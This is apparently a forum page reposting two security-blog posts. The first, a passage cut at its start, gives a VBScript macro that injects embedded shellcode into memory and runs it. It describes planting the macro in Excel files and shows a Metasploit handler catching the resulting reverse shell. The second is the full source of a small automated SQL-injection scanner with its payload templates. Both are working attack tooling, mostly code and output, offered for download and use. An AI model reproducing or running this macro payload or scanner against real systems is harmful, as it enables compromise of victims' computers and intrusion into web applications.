shellcode2vbscript_v0_1/shellcode2vbscript.py RVR.R RVR.vbs root@coresec:~# ls -al CALC.vbs RVR.vbs -rw-r--r-- 1 root root 3418 Apr 23 14:29 CALC.vbs -rw-r--r-- 1 root root 3888 Apr 23 14:30 RVR.vbs Now, our VBScripts are ready, lets see the code of CALC.vbs: Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long Const MEM_COMMIT = &H1000 Const PAGE_EXECUTE_READWRITE = &H40 Private Sub ExecuteShellCode() Dim lpMemory As Long Dim sShellCode As String Dim lResult As Long sShellCode = ShellCode() lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE) lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&) lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&) End Sub Private Function ParseBytes(strBytes) As String Dim aNumbers Dim sShellCode As String Dim iIter sShellCode = "" aNumbers = split(strBytes) for iIter = lbound(aNumbers) to ubound(aNumbers) sShellCode = sShellCode + Chr(aNumbers(iIter)) next ParseBytes = sShellCode End Function Private Function ShellCode1() As String Dim sShellCode As String sShellCode = "" sShellCode = sShellCode + ParseBytes("218 203 184 213 89 140 182 217 116 36 244 95 51 201 177 78 131 239 252 49 71 19 3") sShellCode = sShellCode + ParseBytes("146 74 110 67 199 185 183 216 211 181 243 2 32 140 238 29 101 57 95 218 184 225 184") sShellCode = sShellCode + ParseBytes("102 82 237 186 48 149 215 242 145 177 70 202 221 13 155 44 133 217 202 138 232 188") sShellCode = sShellCode + ParseBytes("196 51 198 163 90 239 67 214 55 124 8 120 173 104 221 142 124 57 128 1 165 213 25") sShellCode = sShellCode + ParseBytes("211 78 145 37 3 200 28 171 244 145 218 247 129 189 181 255 86 252 194 249 233 79 245") sShellCode = sShellCode + ParseBytes("2 25 97 248 38 184 12 119 242 187 205 87 102 116 144 151 201 158 251 33 25 5 144 53") sShellCode = sShellCode + ParseBytes("100 184 8 207 129 122 171 10 62 99 17 116 34 148 79 156 42 73 228 18 96 6 167 143") sShellCode = sShellCode + ParseBytes("228 34 41 111 247 123 85 247 68 166 80 189 205 190 158 93 137 28 108 212 133 52 185") sShellCode = sShellCode + ParseBytes("215 180 95 192 145 200 108 24 117 173 140 206 118 82 154 64 167 202 183 53 137 2 91") sShellCode = sShellCode + ParseBytes("80 100 244 232 208 219 177 71 199 253 147 155 121 72 25 62 202 76 46 221 95 172 86") sShellCode = sShellCode + ParseBytes("237 36 238 199 178 145 95 176 119 135 37 122 45 141 64 166 103 5 48 237 174 171 192") sShellCode = sShellCode + ParseBytes("243 41 24 82 137 232 168 50 187 1 241 73 171 228 212 185 165 227 15 22 27 4 14 205") sShellCode = sShellCode + ParseBytes("66 211 92 161 216 171 236 199 7 240 255 87 192 38 121 162 8 216 18 111 250 92 45 32") sShellCode = sShellCode + ParseBytes("247 238 33 196 105 210 232 13 127 104 232 201 95 57 96 189 67 97 242 253 193 198 186") sShellCode = sShellCode + ParseBytes("109 199 61 47 71 59 141 138 186 249") ShellCode1 = sShellCode End Function Private Function ShellCode() As String Dim sShellCode As String sShellCode = "" sShellCode = sShellCode + ShellCode1() ShellCode = sShellCode End Function Then, we are able to insert the malicious VBScript to our Excel files (CALC.vbs -> CALC.xlsm & RVR.vbs -> RVR.xlsm): Finally let's execute our Macros: root@coresec:~# msfconsole | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.7.0-dev [core:3.7 api:1.0] + -- --=[ 680 exploits - 354 auxiliary + -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12397 updated yesterday (2011.04.21) msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(handler) > set lhost 192.168.200.20 lhost => 192.168.200.20 msf exploit(handler) > set lport 4444 lport => 4444 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.200.20:4444 [*] Starting the payload handler... [*] Sending stage (240 bytes) to 192.168.200.2 [*] Command shell session 1 opened (192.168.200.20:4444 -> 192.168.200.25:45668) at Sat Apr 23 14:54:32 +0300 2011 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\coresec\Documents> NoVirusThanks results: Download: shellcode2vbscript_v0_1 RVR.xlsm CALC.xlsm Create Malicious Excel files using Metasploit and Shellcode2vbscript « AfterShell.com – IT Security Blog
  21. Below you can find the Source Code of the Damn Small SQLi Scanner (DSSS) v. 0.1b having less than 100 LOC (Lines of Code): #!/usr/bin/env python import difflib, httplib, optparse, random, re, sys, urllib2, urlparse NAME = "Damn Small SQLi Scanner (DSSS) < 100 LOC (Lines of Code)" VERSION = "0.1b" AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)" LICENSE = "GPLv2 (www.gnu.org/licenses/gpl-2.0.html)" NOTE = "This is a fully working PoC proving that commercial (SQLi) scanners can be beaten under 100 lines of code (6 hours of work, boolean, error, level 1 crawl)" INVALID_SQL_CHAR_POOL = ['(',')','\'','"'] CRAWL_EXCLUDE_EXTENSIONS = ("gif","jpg","jar","tif","bmp","war","ear","mpg","wmv","mpeg","scm","iso","dmp","dll","cab","so","avi","bin","exe","iso","tar","png","pdf","ps","mp3","zip","rar","gz") SUFFIXES = ["", "-- ", "#"] PREFIXES = [" ", ") ", "' ", "') "] BOOLEANS = ["AND %d=%d", "OR NOT (%d=%d)"] DBMS_ERRORS = {} DBMS_ERRORS["MySQL"] = [r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."] DBMS_ERRORS["PostgreSQL"] = [r"PostgreSQL.*ERROr", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."] DBMS_ERRORS["Microsoft SQL Server"] = [r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"Exception Details:.*\WSystem\.Data\.SqlClient\.", r"Exception Details:.*\WRoadhouse\.Cms\."] DBMS_ERRORS["Microsoft Access"] = [r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"] DBMS_ERRORS["Oracle"] = [r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"] DBMS_ERRORS["IBM DB2"] = [r"CLI Driver.*DB2", r"DB2 SQL error", r"db2_connect\(", r"db2_exec\(", r"db2_execute\(", r"db2_fetch_"] DBMS_ERRORS["Informix"] = [r"Exception.*Informix"] DBMS_ERRORS["Firebird"] = [r"Dynamic SQL Error", r"Warning.*ibase_.*"] DBMS_ERRORS["SQLite"] = [r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::"] DBMS_ERRORS["SAP MaxDB"] = [r"SQL error.*POS([0-9]+).*", r"Warning.*maxdb.*"] DBMS_ERRORS["Sybase"] = [r"Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"] DBMS_ERRORS["Ingres"] = [r"Warning.*ingres_", r"Ingres SQLSTATE", r"Ingres\W.*Driver"] def getTextOnly(page): retVal = re.sub(r"(?s)|<!--.+?-->||<[^>]+>|\s", " ", page) retVal = re.sub(r"\s{2,}", " ", retVal) return retVal def retrieveContent(url): retVal = ["", httplib.OK, "", ""] # [filtered/textual page content, HTTP code, page title, full page content] try: retVal[3] = urllib2.urlopen(url.replace(" ", "%20")).read() except Exception, e: if hasattr(e, 'read'): retVal[3] = e.read() elif hasattr(e, 'msg'): retVal[3] = e.msg retVal[1] = e.code if hasattr(e, 'code') else None match = re.search(r"(?P<title>[^<]+)", retVal[3]) retVal[2] = match.group("title") if match else "" retVal[0] = getTextOnly(retVal[3]) return retVal def shallowCrawl(url): retVal = set([url]) page = retrieveContent(url)[3] for match in re.finditer(r"href\s*=\s*\"(?P[^\"]+)\"", page, re.I): link = urlparse.urljoin(url, match.group("href")) if link.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: if reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, link])): retVal.add(link) return retVal def scanPage(url): for link in shallowCrawl(url): print "* scanning: %s" % link for match in re.finditer(r"(?:[?&;])((?P\w+)=[^&;]+)", link): vulnerable = False tampered = link.replace(match.group(0), match.group(0) + "".join(random.sample(INVALID_SQL_CHAR_POOL, len(INVALID_SQL_CHAR_POOL)))) content = retrieveContent(tampered) for dbms in DBMS_ERRORS: for regex in DBMS_ERRORS[dbms]: if not vulnerable and re.search(regex, content[0], re.I): print " (o) parameter '%s' could be SQLi vulnerable! (%s error message)" % (match.group('parameter'), dbms) vulnerable = True if not vulnerable: original = retrieveContent(link) a, b = random.randint(100, 255), random.randint(100, 255) for prefix in PREFIXES: for boolean in BOOLEANS: for suffix in SUFFIXES: if not vulnerable: template = "%s%s%s" % (prefix, boolean, suffix) payloads = (link.replace(match.group(0), match.group(0) + (template % (a, a))), link.replace(match.group(0), match.group(0) + (template % (a, ))) contents = [retrieveContent(payloads[0]), retrieveContent(payloads[1])] if any(map(lambda x: original[x] == contents[0][x] != contents[1][x], [1, 2])) or len(original) == len(contents[0][0]) != len(contents[1][0]): vulnerable = True else: ratios = map(lambda x: difflib.SequenceMatcher(None, original[0], x).quick_ratio(), [contents[0][0], contents[1][0]]) vulnerable = ratios[0] > 0.95 and ratios[1] < 0.95 if vulnerable: print " (i) parameter '%s' appears to be SQLi vulnerable! (\"%s\")" % (match.group('parameter'), payloads[0]) if __name__ == "__main__": print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR) parser = optparse.OptionParser(version=VERSION) parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.target.com/page.htm?id=1\")") options, _ = parser.parse_args() if options.url: scanPage(options.url) else: parser.print_help() http://www.aftershell.com/2011/07/16/python-damn-small-sqli-scanner-dsss-v0-1b/
×
×
  • Create New...